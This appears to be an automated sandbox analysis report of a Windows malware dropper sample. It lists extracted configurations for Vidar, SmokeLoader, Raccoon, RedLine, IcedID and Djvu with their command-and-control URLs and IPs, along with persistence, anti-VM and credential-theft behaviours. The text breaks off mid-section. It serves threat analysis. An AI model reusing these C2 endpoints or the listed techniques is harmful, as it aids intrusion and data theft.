Resubmissions
23-10-2021 15:52
211023-tbkbesdcfm 1022-10-2021 17:40
211022-v8trsscggr 1022-10-2021 15:55
211022-tc9ygacgan 1022-10-2021 14:38
211022-rz1bfabgb8 10Analysis
-
max time kernel
229s -
max time network
1804s -
platform
windows10_x64 -
resource
win10-ja-20211014 -
submitted
22-10-2021 14:38
Static task
static1
Behavioral task
behavioral1
Sample
Fri051e1e7444.exe
Resource
win7-ja-20210920
Behavioral task
behavioral2
Sample
Fri051e1e7444.exe
Resource
win7-en-20210920
Behavioral task
behavioral3
Sample
Fri051e1e7444.exe
Resource
win7-de-20211014
Behavioral task
behavioral4
Sample
Fri051e1e7444.exe
Resource
win11
Behavioral task
behavioral5
Sample
Fri051e1e7444.exe
Resource
win10-ja-20211014
Behavioral task
behavioral6
Sample
Fri051e1e7444.exe
Resource
win10-en-20210920
Behavioral task
behavioral7
Sample
Fri051e1e7444.exe
Resource
win10-de-20210920
General
-
Target
Fri051e1e7444.exe
-
Size
403KB
-
MD5
b4c503088928eef0e973a269f66a0dd2
-
SHA1
eb7f418b03aa9f21275de0393fcbf0d03b9719d5
-
SHA256
2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2
-
SHA512
c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465
Malware Config
Extracted
vidar
41.5
916
https://mas.to/@xeroxxx
-
profile_id
916
Extracted
vidar
41.5
937
https://mas.to/@xeroxxx
-
profile_id
937
Extracted
smokeloader
2020
http://gejajoo7.top/
http://sysaheu9.top/
http://directorycart.com/upload/
http://tierzahnarzt.at/upload/
http://streetofcards.com/upload/
http://ycdfzd.com/upload/
http://successcoachceo.com/upload/
http://uhvu.cn/upload/
http://japanarticle.com/upload/
Extracted
raccoon
1.8.1
874dee7d322070fc6dc34b3b6cd43904077db44d
-
url4cnc
https://telete.in/isuzoShadowhunter
Extracted
redline
205.185.119.191:60857
Extracted
raccoon
7c9b4504a63ed23664e38808e65948379b790395
-
url4cnc
http://telegka.top/capibar
http://telegin.top/capibar
https://t.me/capibar
Extracted
vidar
41.5
921
https://mas.to/@xeroxxx
-
profile_id
921
Extracted
redline
james222
135.181.129.119:4805
Extracted
icedid
1875681804
Extracted
djvu
http://rlrz.org/lancer
Signatures
-
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rundll32.exerundll32.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 888 3048 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4844 3048 rundll32.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 7 IoCs
Processes:
resource yara_rule behavioral5/memory/1952-246-0x00000000030E0000-0x00000000030FF000-memory.dmp family_redline behavioral5/memory/1952-261-0x0000000004E30000-0x0000000004E4D000-memory.dmp family_redline behavioral5/memory/4588-311-0x00000000004368BE-mapping.dmp family_redline behavioral5/memory/4580-310-0x0000000000418B0E-mapping.dmp family_redline behavioral5/memory/4588-309-0x0000000000400000-0x000000000043C000-memory.dmp family_redline behavioral5/memory/4580-308-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral5/memory/6084-396-0x0000000000418AFE-mapping.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\Pictures\Adobe Films\W1bYeEIYUUPaZDtUMFaYTrWG.exe family_socelars C:\Users\Admin\Pictures\Adobe Films\W1bYeEIYUUPaZDtUMFaYTrWG.exe family_socelars -
Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exedescription pid process target process PID 4548 created 3724 4548 WerFault.exe aj1qRBbUcTuprnRCEvZjOudA.exe PID 1012 created 588 1012 WerFault.exe omVlxP3RfKIM3eS4IizTb8IP.exe PID 4192 created 828 4192 WerFault.exe OOEA7DkxfTRmQavkjfVnrAHD.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 7 IoCs
Processes:
resource yara_rule behavioral5/memory/1228-183-0x0000000000D60000-0x0000000000E36000-memory.dmp family_vidar behavioral5/memory/3960-187-0x0000000000DB0000-0x0000000000E86000-memory.dmp family_vidar behavioral5/memory/3960-191-0x0000000000400000-0x00000000008F1000-memory.dmp family_vidar behavioral5/memory/1228-189-0x0000000000400000-0x00000000008E3000-memory.dmp family_vidar behavioral5/memory/2076-218-0x0000000001800000-0x00000000018D8000-memory.dmp family_vidar C:\Users\Admin\AppData\Local\Temp\build.exe family_vidar C:\Users\Admin\AppData\Local\Temp\build.exe family_vidar -
Blocklisted process makes network request 4 IoCs
Processes:
mshta.exeflow pid process 284 3392 mshta.exe 301 3392 mshta.exe 312 3392 mshta.exe 315 3392 mshta.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
Processes:
DllHost.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts DllHost.exe File opened for modification C:\Windows\system32\drivers\etc\hosts -
Executes dropped EXE 60 IoCs
Processes:
AgGOSclM3apmo74sb5reIH3y.exenHvwzSVZB5C_2lNYpayO6xbN.exe_g7tmzcXIP_JNr02UultIUME.exeTrvPKMajtMffCi7iitJBZDnB.exee6WeCqUpNWJV6aPgszJeX9E0.exeLYOsEH3xUWPTG6qnvscLPweb.exeW1bYeEIYUUPaZDtUMFaYTrWG.exeIU5rmCoRAx2aHgjhPh2xdpHv.exeOerARSDN8_Y6xtKjAv9ItJbN.exe6OMebL7JbPas8BcXIUNnfFcX.exeJFXVqZOn7ssgWpUgV2CUaIij.exeVEa4XNX37VROBVrK80k5VxkO.exeaj1qRBbUcTuprnRCEvZjOudA.exeomVlxP3RfKIM3eS4IizTb8IP.exeRD8KFq6f5QViwV0MrTou3rpZ.exeAecmysbzIXMVq1dRFsqTK8lb.exefEbcFuzCW9Be1RqlDsqMbCAi.exer3FYzQQodjD253E15m9ZD5ze.exeY7B85KyvjK4STp4RCLBO190o.exeGmsDXcf5_0hLpT8X9au5MwZp.exeTrvPKMajtMffCi7iitJBZDnB.exeomVlxP3RfKIM3eS4IizTb8IP.exex7X0Exp5JXLQiSV9Bd8veIvG.exex7X0Exp5JXLQiSV9Bd8veIvG.tmpxWNdnVltEX96FstYNvLHfW1j.exebuild.exe6gLgVHK4S6fRDlTOaK71bGb9.exeDYbALA.executm3.exeDownFlSetup999.exeinst3.exe_g7tmzcXIP_JNr02UultIUME.exeGmsDXcf5_0hLpT8X9au5MwZp.exeMS7ss0t3Z_BgNm5vQL0FhEFR.exeOOEA7DkxfTRmQavkjfVnrAHD.exez43qKkeelVhYZeo9SP_z8aeG.exemshta.exezObJUR9EVjyfYx_qv35UyzNe.exer8MBUoHvcWqO6aNLC5f23A0S.exef7VAnYD0ZMCm46C7pv9aNPyZ.exeV4SCYlZHCcOHjngJbi971hMu.exer3FYzQQodjD253E15m9ZD5ze.exef7VAnYD0ZMCm46C7pv9aNPyZ.tmpsvchost.exesetup.exekPBhgOaGQk.exeDllHost.exesetup.exefoldershare.exeA53B.exefoldershare.exeWysadudaecu.exeMipijaedila.exeZHalijicaeshe.exeSHumokyhefi.exe379.exe19D1.exeConhost.exeGcleanerEU.exepid process 1808 AgGOSclM3apmo74sb5reIH3y.exe 1184 nHvwzSVZB5C_2lNYpayO6xbN.exe 1396 _g7tmzcXIP_JNr02UultIUME.exe 2404 TrvPKMajtMffCi7iitJBZDnB.exe 2520 e6WeCqUpNWJV6aPgszJeX9E0.exe 2076 LYOsEH3xUWPTG6qnvscLPweb.exe 1892 W1bYeEIYUUPaZDtUMFaYTrWG.exe 2184 IU5rmCoRAx2aHgjhPh2xdpHv.exe 2060 OerARSDN8_Y6xtKjAv9ItJbN.exe 1228 6OMebL7JbPas8BcXIUNnfFcX.exe 2120 JFXVqZOn7ssgWpUgV2CUaIij.exe 3960 VEa4XNX37VROBVrK80k5VxkO.exe 3724 aj1qRBbUcTuprnRCEvZjOudA.exe 3532 omVlxP3RfKIM3eS4IizTb8IP.exe 1952 RD8KFq6f5QViwV0MrTou3rpZ.exe 3608 AecmysbzIXMVq1dRFsqTK8lb.exe 1632 fEbcFuzCW9Be1RqlDsqMbCAi.exe 1784 r3FYzQQodjD253E15m9ZD5ze.exe 2732 Y7B85KyvjK4STp4RCLBO190o.exe 680 GmsDXcf5_0hLpT8X9au5MwZp.exe 2524 TrvPKMajtMffCi7iitJBZDnB.exe 588 omVlxP3RfKIM3eS4IizTb8IP.exe 2224 x7X0Exp5JXLQiSV9Bd8veIvG.exe 4212 x7X0Exp5JXLQiSV9Bd8veIvG.tmp 4200 xWNdnVltEX96FstYNvLHfW1j.exe 4732 build.exe 4012 6gLgVHK4S6fRDlTOaK71bGb9.exe 4148 DYbALA.exe 4824 cutm3.exe 4868 DownFlSetup999.exe 4924 inst3.exe 4580 _g7tmzcXIP_JNr02UultIUME.exe 4588 GmsDXcf5_0hLpT8X9au5MwZp.exe 1480 MS7ss0t3Z_BgNm5vQL0FhEFR.exe 828 OOEA7DkxfTRmQavkjfVnrAHD.exe 3740 z43qKkeelVhYZeo9SP_z8aeG.exe 3392 mshta.exe 5124 zObJUR9EVjyfYx_qv35UyzNe.exe 5156 r8MBUoHvcWqO6aNLC5f23A0S.exe 5180 f7VAnYD0ZMCm46C7pv9aNPyZ.exe 6044 V4SCYlZHCcOHjngJbi971hMu.exe 6084 r3FYzQQodjD253E15m9ZD5ze.exe 6124 f7VAnYD0ZMCm46C7pv9aNPyZ.tmp 6028 svchost.exe 1160 setup.exe 3872 kPBhgOaGQk.exe 5796 DllHost.exe 5688 setup.exe 4312 foldershare.exe 3952 A53B.exe 5220 foldershare.exe 5776 Wysadudaecu.exe 5012 Mipijaedila.exe 4312 foldershare.exe 1268 ZHalijicaeshe.exe 5680 SHumokyhefi.exe 4916 379.exe 6004 19D1.exe 3680 Conhost.exe 6544 GcleanerEU.exe -
Modifies Windows Firewall 1 TTPs
-
Checks BIOS information in registry 2 TTPs 10 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Y7B85KyvjK4STp4RCLBO190o.exesvchost.exe379.exeIU5rmCoRAx2aHgjhPh2xdpHv.exeAecmysbzIXMVq1dRFsqTK8lb.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Y7B85KyvjK4STp4RCLBO190o.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Y7B85KyvjK4STp4RCLBO190o.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 379.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 379.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion IU5rmCoRAx2aHgjhPh2xdpHv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion AecmysbzIXMVq1dRFsqTK8lb.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion IU5rmCoRAx2aHgjhPh2xdpHv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion AecmysbzIXMVq1dRFsqTK8lb.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Fri051e1e7444.exe6gLgVHK4S6fRDlTOaK71bGb9.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation Fri051e1e7444.exe Key value queried \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation 6gLgVHK4S6fRDlTOaK71bGb9.exe -
Loads dropped DLL 29 IoCs
Processes:
xWNdnVltEX96FstYNvLHfW1j.exex7X0Exp5JXLQiSV9Bd8veIvG.tmp6OMebL7JbPas8BcXIUNnfFcX.exeVEa4XNX37VROBVrK80k5VxkO.exebuild.exeV4SCYlZHCcOHjngJbi971hMu.exef7VAnYD0ZMCm46C7pv9aNPyZ.tmpsetup.exesetup.exe19D1.exemsiexec.exepid process 4200 xWNdnVltEX96FstYNvLHfW1j.exe 4200 xWNdnVltEX96FstYNvLHfW1j.exe 4200 xWNdnVltEX96FstYNvLHfW1j.exe 4212 x7X0Exp5JXLQiSV9Bd8veIvG.tmp 1228 6OMebL7JbPas8BcXIUNnfFcX.exe 1228 6OMebL7JbPas8BcXIUNnfFcX.exe 3960 VEa4XNX37VROBVrK80k5VxkO.exe 3960 VEa4XNX37VROBVrK80k5VxkO.exe 4732 build.exe 4732 build.exe 4200 xWNdnVltEX96FstYNvLHfW1j.exe 4200 xWNdnVltEX96FstYNvLHfW1j.exe 4200 xWNdnVltEX96FstYNvLHfW1j.exe 6044 V4SCYlZHCcOHjngJbi971hMu.exe 6044 V4SCYlZHCcOHjngJbi971hMu.exe 6124 f7VAnYD0ZMCm46C7pv9aNPyZ.tmp 1160 setup.exe 1160 setup.exe 6044 V4SCYlZHCcOHjngJbi971hMu.exe 6044 V4SCYlZHCcOHjngJbi971hMu.exe 6044 V4SCYlZHCcOHjngJbi971hMu.exe 6044 V4SCYlZHCcOHjngJbi971hMu.exe 6044 V4SCYlZHCcOHjngJbi971hMu.exe 6044 V4SCYlZHCcOHjngJbi971hMu.exe 5688 setup.exe 5688 setup.exe 6004 19D1.exe 6288 msiexec.exe 6288 msiexec.exe -
Modifies file permissions 1 TTPs 1 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\Pictures\Adobe Films\IU5rmCoRAx2aHgjhPh2xdpHv.exe themida C:\Users\Admin\Pictures\Adobe Films\fEbcFuzCW9Be1RqlDsqMbCAi.exe themida C:\Users\Admin\Pictures\Adobe Films\Y7B85KyvjK4STp4RCLBO190o.exe themida behavioral5/memory/2732-230-0x0000000000080000-0x0000000000081000-memory.dmp themida behavioral5/memory/2184-232-0x0000000000370000-0x0000000000371000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
DllHost.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Defender\\Peqydaelyly.exe\"" DllHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\WindowsPowerShell\\Xumaelyfyshu.exe\"" -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
mshta.exeJFXVqZOn7ssgWpUgV2CUaIij.exemshta.exe379.exeIU5rmCoRAx2aHgjhPh2xdpHv.exeMipijaedila.exekPBhgOaGQk.exeSHumokyhefi.exeY7B85KyvjK4STp4RCLBO190o.exeOerARSDN8_Y6xtKjAv9ItJbN.exex7X0Exp5JXLQiSV9Bd8veIvG.tmpz43qKkeelVhYZeo9SP_z8aeG.exesvchost.exeAecmysbzIXMVq1dRFsqTK8lb.exef7VAnYD0ZMCm46C7pv9aNPyZ.tmpmshta.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mshta.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA JFXVqZOn7ssgWpUgV2CUaIij.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mshta.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 379.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA IU5rmCoRAx2aHgjhPh2xdpHv.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Mipijaedila.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA kPBhgOaGQk.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA SHumokyhefi.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Y7B85KyvjK4STp4RCLBO190o.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA OerARSDN8_Y6xtKjAv9ItJbN.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA x7X0Exp5JXLQiSV9Bd8veIvG.tmp Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA z43qKkeelVhYZeo9SP_z8aeG.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA svchost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA AecmysbzIXMVq1dRFsqTK8lb.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA f7VAnYD0ZMCm46C7pv9aNPyZ.tmp Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mshta.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 14 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 167 ipinfo.io 5890 api.2ip.ua 18 ipinfo.io 19 ipinfo.io 211 ipinfo.io 1368 api.2ip.ua 4910 api.2ip.ua 169 ipinfo.io 218 ip-api.com 524 ip-api.com 558 ipinfo.io 560 ipinfo.io 1129 api.2ip.ua 1130 api.2ip.ua -
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
Processes:
IU5rmCoRAx2aHgjhPh2xdpHv.exeY7B85KyvjK4STp4RCLBO190o.exe379.exepid process 2184 IU5rmCoRAx2aHgjhPh2xdpHv.exe 2732 Y7B85KyvjK4STp4RCLBO190o.exe 4916 379.exe -
Suspicious use of SetThreadContext 6 IoCs
Processes:
TrvPKMajtMffCi7iitJBZDnB.exeomVlxP3RfKIM3eS4IizTb8IP.exe_g7tmzcXIP_JNr02UultIUME.exeGmsDXcf5_0hLpT8X9au5MwZp.exer3FYzQQodjD253E15m9ZD5ze.exefoldershare.exedescription pid process target process PID 2404 set thread context of 2524 2404 TrvPKMajtMffCi7iitJBZDnB.exe TrvPKMajtMffCi7iitJBZDnB.exe PID 3532 set thread context of 588 3532 omVlxP3RfKIM3eS4IizTb8IP.exe omVlxP3RfKIM3eS4IizTb8IP.exe PID 1396 set thread context of 4580 1396 _g7tmzcXIP_JNr02UultIUME.exe _g7tmzcXIP_JNr02UultIUME.exe PID 680 set thread context of 4588 680 GmsDXcf5_0hLpT8X9au5MwZp.exe GmsDXcf5_0hLpT8X9au5MwZp.exe PID 1784 set thread context of 6084 1784 r3FYzQQodjD253E15m9ZD5ze.exe r3FYzQQodjD253E15m9ZD5ze.exe PID 4312 set thread context of 3952 4312 foldershare.exe A53B.exe -
Drops file in Program Files directory 14 IoCs
Processes:
e6WeCqUpNWJV6aPgszJeX9E0.exeOerARSDN8_Y6xtKjAv9ItJbN.exeDllHost.exedescription ioc process File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe e6WeCqUpNWJV6aPgszJeX9E0.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\Uninstall.exe OerARSDN8_Y6xtKjAv9ItJbN.exe File created C:\Program Files (x86)\WindowsPowerShell\Xumaelyfyshu.exe File created C:\Program Files (x86)\WindowsPowerShell\Xumaelyfyshu.exe.config File created C:\Program Files (x86)\Company\NewProduct\Uninstall.ini OerARSDN8_Y6xtKjAv9ItJbN.exe File created C:\Program Files\Windows Defender Advanced Threat Protection\BNYIKCYPWG\foldershare.exe DllHost.exe File created C:\Program Files\Windows Defender Advanced Threat Protection\BNYIKCYPWG\foldershare.exe.config DllHost.exe File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe e6WeCqUpNWJV6aPgszJeX9E0.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\inst3.exe OerARSDN8_Y6xtKjAv9ItJbN.exe File created C:\Program Files (x86)\Windows Defender\Peqydaelyly.exe DllHost.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\cutm3.exe OerARSDN8_Y6xtKjAv9ItJbN.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe OerARSDN8_Y6xtKjAv9ItJbN.exe File created C:\Program Files\Mozilla Firefox\AMTMFOCQMW\foldershare.exe File created C:\Program Files\Mozilla Firefox\AMTMFOCQMW\foldershare.exe.config -
Drops file in Windows directory 7 IoCs
Processes:
MicrosoftEdge.exeAecmysbzIXMVq1dRFsqTK8lb.exesvchost.exedescription ioc process File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdge.exe File created C:\Windows\System\xxx1.bak AecmysbzIXMVq1dRFsqTK8lb.exe File created C:\Windows\System\svchost.exe AecmysbzIXMVq1dRFsqTK8lb.exe File opened for modification C:\Windows\System\svchost.exe AecmysbzIXMVq1dRFsqTK8lb.exe File created C:\Windows\System\xxx1.bak svchost.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 25 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 4376 3724 WerFault.exe aj1qRBbUcTuprnRCEvZjOudA.exe 4980 3724 WerFault.exe aj1qRBbUcTuprnRCEvZjOudA.exe 4676 3724 WerFault.exe aj1qRBbUcTuprnRCEvZjOudA.exe 1048 3724 WerFault.exe aj1qRBbUcTuprnRCEvZjOudA.exe 4548 3724 WerFault.exe aj1qRBbUcTuprnRCEvZjOudA.exe 1012 588 WerFault.exe omVlxP3RfKIM3eS4IizTb8IP.exe 4152 828 WerFault.exe OOEA7DkxfTRmQavkjfVnrAHD.exe 5468 828 WerFault.exe OOEA7DkxfTRmQavkjfVnrAHD.exe 5604 828 WerFault.exe OOEA7DkxfTRmQavkjfVnrAHD.exe 5728 828 WerFault.exe OOEA7DkxfTRmQavkjfVnrAHD.exe 4108 828 WerFault.exe OOEA7DkxfTRmQavkjfVnrAHD.exe 3756 828 WerFault.exe OOEA7DkxfTRmQavkjfVnrAHD.exe 4192 828 WerFault.exe OOEA7DkxfTRmQavkjfVnrAHD.exe 6816 6544 WerFault.exe GcleanerEU.exe 1512 6544 WerFault.exe GcleanerEU.exe 6412 6544 WerFault.exe GcleanerEU.exe 6928 6544 WerFault.exe GcleanerEU.exe 1512 6956 WerFault.exe gcleaner.exe 5496 6956 WerFault.exe gcleaner.exe 6148 6956 WerFault.exe gcleaner.exe 2320 6956 WerFault.exe gcleaner.exe 4216 6848 WerFault.exe gcleaner.exe 5720 6956 WerFault.exe gcleaner.exe 8028 6848 WerFault.exe gcleaner.exe 4504 6956 WerFault.exe gcleaner.exe -
NSIS installer 4 IoCs
Processes:
resource yara_rule C:\Users\Admin\Pictures\Adobe Films\xWNdnVltEX96FstYNvLHfW1j.exe nsis_installer_1 C:\Users\Admin\Pictures\Adobe Films\xWNdnVltEX96FstYNvLHfW1j.exe nsis_installer_2 C:\Users\Admin\Pictures\Adobe Films\xWNdnVltEX96FstYNvLHfW1j.exe nsis_installer_1 C:\Users\Admin\Pictures\Adobe Films\xWNdnVltEX96FstYNvLHfW1j.exe nsis_installer_2 -
Checks SCSI registry key(s) 3 TTPs 12 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
zObJUR9EVjyfYx_qv35UyzNe.exeA53B.exeTrvPKMajtMffCi7iitJBZDnB.exe19D1.exedescription ioc process Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI zObJUR9EVjyfYx_qv35UyzNe.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI A53B.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI TrvPKMajtMffCi7iitJBZDnB.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI TrvPKMajtMffCi7iitJBZDnB.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI zObJUR9EVjyfYx_qv35UyzNe.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI A53B.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 19D1.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 19D1.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 19D1.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI TrvPKMajtMffCi7iitJBZDnB.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI zObJUR9EVjyfYx_qv35UyzNe.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI A53B.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
build.exe6OMebL7JbPas8BcXIUNnfFcX.exeVEa4XNX37VROBVrK80k5VxkO.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 build.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString build.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 6OMebL7JbPas8BcXIUNnfFcX.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 6OMebL7JbPas8BcXIUNnfFcX.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 VEa4XNX37VROBVrK80k5VxkO.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString VEa4XNX37VROBVrK80k5VxkO.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exepid process 2460 schtasks.exe 808 schtasks.exe 5760 schtasks.exe -
Delays execution with timeout.exe 7 IoCs
Processes:
timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exepid process 4936 timeout.exe 3304 timeout.exe 1812 timeout.exe 8652 timeout.exe 8816 timeout.exe 6632 timeout.exe 8116 timeout.exe -
Download via BitsAdmin 1 TTPs 1 IoCs
-
Kills process with taskkill 12 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 5800 taskkill.exe 5772 taskkill.exe 5696 taskkill.exe 7804 taskkill.exe 7148 taskkill.exe 5224 taskkill.exe 5076 taskkill.exe 5784 taskkill.exe 888 taskkill.exe 7096 taskkill.exe 6136 taskkill.exe 8472 taskkill.exe -
Processes:
mshta.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\International\CpMRU mshta.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\International\CpMRU\Enable = "1" mshta.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\International\CpMRU\Size = "10" mshta.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\International\CpMRU\InitHits = "100" mshta.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\International\CpMRU\Factor = "20" mshta.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\International\CpMRU\Cache = a403000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 mshta.exe -
Modifies registry class 48 IoCs
Processes:
